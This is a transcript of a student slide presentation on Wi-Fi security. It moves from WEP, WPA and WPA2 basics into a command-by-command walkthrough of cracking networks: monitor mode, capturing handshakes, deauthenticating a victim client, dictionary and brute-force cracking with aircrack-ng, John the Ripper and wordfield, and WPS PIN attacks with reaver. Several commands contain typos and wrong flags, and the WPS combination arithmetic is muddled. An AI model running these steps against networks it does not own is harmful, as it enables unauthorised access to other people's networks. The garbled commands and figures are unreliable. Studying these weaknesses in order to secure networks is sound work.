exploiting wifi security
DESCRIPTION
this slide is regarding wifi Security exploitationTRANSCRIPT
WPA EXPLOITATION IN THE WORLD OF WIRELESS NETWORK
By Hariraj Rathod8th sem
Department of Electronics and Communication
WIFI – WIRELESS FIDELITY
Wi-Fi, is a popular technology that allows an electronic device to exchange data or connect to the internet wirelessly using radio waves.
Wireless access allows users to connect to the internet from any location within range of a wireless access point.
SOME BASIC TERMS
MAC address or physical address is a unique identifier assigned to network interfaces for communications
Access point >> Wireless router
SSID (service set identifier) >> Network Name
BSSID (basic service set identification ) >> MAC address of the access point
BASIC WORKING
When a user uses wireless internet they generate what are called data “packets”.
Packets are transmitted between the wireless card and the wireless access point via radio waves whenever the computer is connected with the access point.
BASIC WORKING CONTD.
Depending on how long the computer is connected, it can generate a certain number of packets per day.
The more users that are connected to one access point, the more packets are generated.
WIRELESS USES RADIO FREQUENCY
2.4 Ghz wifi spectrum
WIRELESS ENCRYPTION
The main source of vulnerability associated with wireless networks are the methods of encryption. Different type of wireless encryption are as follows:
WEP WPA WPA2
WEP
Stands for Wired Equivalent Privacy.
WEP is recognizable by the key of 10 or 26 hexadecimal digits.
WEP protocol was not developed by researchers or experts in security and cryptography.
Initial bytes of the key stream depended on just a few bits of the encryption key.
WEP CONTINUED
WEP Encryption Process
ICV:-32 bit integrity check value (ICV)IV:- Initialization Vector
WEP CONTINUED
WEP Decryption Process
With multiple wireless clients sending a large amount of data, an attacker can remotely capture large amounts of WEP ciphertext and use cryptanalysis methods to determine the WEP key.
WPA OR WPA2 Stands for Wi-Fi Protected Access
Created to provide stronger security
Still able to be cracked if a short password is used.
If a long passphrase or password is used, these protocol are virtually not crackable.
WPA-PSK and TKIP(Temporal Key Integrity Protocol ) or AES(Advance Encryption Standard) use a Pre-Shared Key (PSK) that is more than 7 and less than 64 characters in length.
WPS (WiFi protected Feature) simple plug and play feature.
USING BACKTRACK >>
Some Basic Backtrack Terms >>Wlan1 – wireless interfaceMon0 – monitor modeHandshake –
refers to the negotiation process between the computer and a WiFi server using WPA encryption.
Needed to crack WPA/WPA2.Dictionary - consisting the list of common
passwords. .cap file – used to store packets.
MONITOR MODE
Monitor mode, or RFMON (Radio Frequency MONitor) mode, allows a computer with a wireless network interface controller (WNIC) to monitor all traffic received from the wireless network.
Monitor mode allows packets to be captured without having to associate with an access point first.
TOOLS USED
Airmon-ng >> Placing different cards in monitor mode
Airodump-ng (Packet sniffer ) >> Tool used to listen to wireless routers in the area.
Aireplay-ng ( Packet injector ) >> Aireplay-ng is used to inject frames. The primary function is to generate traffic for the later
use in aircrack-ng for cracking the WEP and WPA-PSK keys.
Aircrack-ng >> Cracks WEP and WPA (Dictionary attack) keys.
TOOLS USED….CONTINUED Word Field (Brute Force)
Reaver Tool. (Brute Force)
AIRCRACK-NG Selecting the Interface to put it in monitor
mode. Command used airmon-ng start wlan1
AIRCRACK-NG CONTINUED
Start Capturing Packets. Airodump-ng mon0
Airodump-ng mon0 –channel 1 –bssid “mac id” –w reddot
AIRCRACK-NG CONTINUED
Deauthenticate the device connected to access point and force them to re exchange WPA key.
Aireplay-ng -o 4 -a F4:EC:38:BA:6C:44 –c 90:4C:E5:B2:6F:D8 mon0 where "-0 4" tells aireplay to inject deauthentication packets (4 of them), "-a" is the wireless access point MAC address and "-c" is the client (victim) MAC address.
AIRCRACK-NG CONTINUED
Authentication process in WPA
AIRCRACK-NG CONTINUED
4-way handshake os captured.
AIRCRACK-NG CONTINUED
Cracking the WPA key using aircrack-ng, dictionary file and 4-way handshake captured file redot.cap aircrack-ng -w /home/pranav/download/password.lst–b F4:EC:38:BA:6C:44 /home/pranav/reddot-01.cap where "-w" specifies the dictionary file to use.
JOHN THE RIPPER
Faster then the previously used tool. /pentest/password/john-1.7.6.jumbo12/run/
john -stdout -incremantal all aircrack-ng –b 00:17:9A:82:44:1B -w -/home/pranav/test-01.cap
WORD FIELD
Word Field is a brute force attack. Command line used wordfield [OPTION...]
MINLENGTH [MAXLENGTH] Wordfield -a -n 8 8" will output all possible
alphanumeric strings which are 8 characters long.
wordfield -a -n 8 8 | aircrack-ng –b 00:17:9A:82:44:1B -w - /home/pranav/Wifire-02.cap
This attack is really effective on weak keys.
WORD FIELD CONTINUED
The below took 22 hrs 7 minutes and 35 seconds
DICTIONARY AND BRUTE FORCE LIMITATIONS
Passphrase cant be necessarily be found in Dictionary list hence it has its limitations.
Brute force technics require lot of fast hardware computational power.
Source: http://lastbit.com/pswcalc.asp
REAVER TOOL.
Reaver is fantastic tool to crack WPS pin written by Craig Heffner.
This tool exploits the wps 8 digit pin. 1 bit is a checksum bit. 7 unknown numbers, meaning there are a
possible 10^7 (10,000,000) combinations which will take approximately 116 days to break at 1 attempt every second.
REAVER TOOL CONTINUED
WPS pin 65020920
REAVER TOOL CONTINUED
Finding WPS victim wash –I mon0
REAVER TOOL CONTINUEDCRACKING TECHNIQUE
WPS pin 6502-0920 10^4 (10,000) combinations. But since 1st bit is checksum bit hence the
combinations reduce to 10^3(1000) This reduces the time required to break the
PIN to just over 3 hours - Again, assuming that 1 attempt is made every second.
REAVER TOOL CONTINUED
reaver -i mon0 –b F4:EC:38:BA:6C:44
REAVER TOOL CONTINUED
BESECURED
REFERENCES Wi-Fi security – WEP, WPA and WPA2 Guillaume
Lehembre http://en.wikipedia.org/wiki/Wi-
Fi_Protected_Access#WPS_PIN_recovery https://sites.google.com/site/clickdeathsquad/
Home/cds-wpacrack http://samiux.blogspot.in/2010/04/howto-
crackwpawpa2-psk-with-john.html http://www.zer0trusion.com/2011/09/
crackingwpa-without-dictionary.html Tactical Network Solutions WiFi Security Megaprimer by Vivek
Ramchandran
THANKS : )